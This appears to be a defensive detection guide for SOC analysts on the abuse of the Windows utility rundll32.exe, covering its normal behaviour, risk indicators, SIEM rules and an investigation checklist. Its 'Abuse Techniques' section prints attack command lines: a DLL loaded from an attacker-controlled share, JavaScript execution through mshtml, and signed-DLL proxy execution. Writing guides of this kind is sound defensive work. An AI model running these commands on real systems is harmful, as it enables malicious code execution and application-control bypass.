rundll32.exeSYSTEM UTILITYrundll32.exe - LOLBin Security Analysis & Detection Guide
rundll32.exe is a Windows utility for executing DLL functions from the command line. It is one of the **most frequently abused Living-off-the-Land Binaries (LOLBins)** for executing malicious code, bypassing application controls, and defense evasion. Command-line analysis is essential for detecting abuse.
Risk Summary
HIGH priority for SOC triage. rundll32.exe is a **top-tier LOLBin** abused by virtually all threat actor categories. Focus on: unusual DLL paths, JavaScript execution, network connections, and encoded parameters.
Overview
What is rundll32.exe?
rundll32.exe is a Windows system utility designed to execute functions exported by DLL files.
Syntax:
rundll32.exe DLLname,EntryPoint [arguments]
Legitimate Uses
- Launching Control Panel applets
- System configuration functions
- Shell extensions
- Printer management
Security Significance
- Ubiquity: Present on every Windows system
- Flexibility: Can load and execute arbitrary DLL code
- Trust: Often allowlisted by application control
- LOLBin: Extensively documented in LOLBAS project
Appears in nearly every major threat report.
Normal Behavior
Normal Behavior
Expected Process State
| Property | Expected Value |
|---|---|
| Path | C:\Windows\System32\rundll32.exe |
| Path (32-bit) | C:\Windows\SysWOW64\rundll32.exe |
| Parent | explorer.exe, svchost.exe, msiexec.exe |
| Lifetime | Short-lived (exits after task) |
| Network | Unusual for most use cases |
| User | Typically user context |
Legitimate Command Examples
rundll32.exe shell32.dll,Control_RunDLL
rundll32.exe user32.dll,LockWorkStation
rundll32.exe printui.dll,PrintUIEntry
Common Locations
C:\Windows\System32\rundll32.exeC:\Windows\SysWOW64\rundll32.exeSuspicious Indicators
Legitimate vs Suspicious
LEGITIMATE
DLL Path: System32, well-known DLLs
Parent: explorer.exe, svchost.exe
Lifetime: Short-lived
Network: None
Command: Recognizable functions
SUSPICIOUS
DLL Path: Temp, Downloads, User profiles
Protocol: javascript:, file://
Command: Base64, encoded parameters
Network: Outbound connections
Lifetime: Long-running
Children: cmd.exe, powershell.exe
High-Risk Indicators
| Indicator | Risk Level |
|---|---|
| DLL from Temp/Downloads | CRITICAL |
| javascript: protocol | CRITICAL |
| Network connections | HIGH |
| Encoded command line | HIGH |
| Long-running process | MEDIUM |
Abuse Techniques
Attack Techniques
Technique #1: Malicious DLL Execution (T1218.011)
rundll32.exe C:\Users\Public\evil.dll,DllMain
rundll32.exe \\attacker\share\payload.dll,Run
Technique #2: JavaScript Execution
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication"
Technique #3: Application Control Bypass
Using rundll32 to load DLLs from allowed locations with malicious content.
Technique #4: Signed DLL Abuse
rundll32.exe advpack.dll,LaunchINFSection
rundll32.exe ieadvpack.dll,LaunchINFSection
rundll32.exe setupapi.dll,InstallHinfSection
Real-World Abuse
Used by: Emotet, TrickBot, Qakbot, APT28, APT29, Cobalt Strike
Detection Guidance
Detection Strategies
Priority #1: Command-Line Analysis
SIEM Rule:
Process = "rundll32.exe" AND
CommandLine MATCHES "(Temp|Downloads|Users|AppData)"
→ ALERT: HIGH
Priority #2: JavaScript Detection
Process = "rundll32.exe" AND
CommandLine CONTAINS "javascript:"
→ ALERT: CRITICAL
Priority #3: Network Monitoring
Process = "rundll32.exe" AND
NetworkConnection = True
→ ALERT: HIGH
Priority #4: Child Process Monitoring
Parent = "rundll32.exe" AND
Child IN ("cmd.exe", "powershell.exe")
→ ALERT: HIGH
Remediation Steps
Remediation
- Capture full command line and process tree
- Identify and analyze the DLL
- Check network connections
- Remove malicious files
- Search for persistence mechanisms
Investigation Checklist
Investigation Checklist
- Capture full command-line arguments
- Verify rundll32 path (System32 or SysWOW64)
- Analyze DLL location and signature
- Check for network connections
- Review parent process
- Look for javascript: protocol abuse
- Check for encoded parameters
- Monitor child processes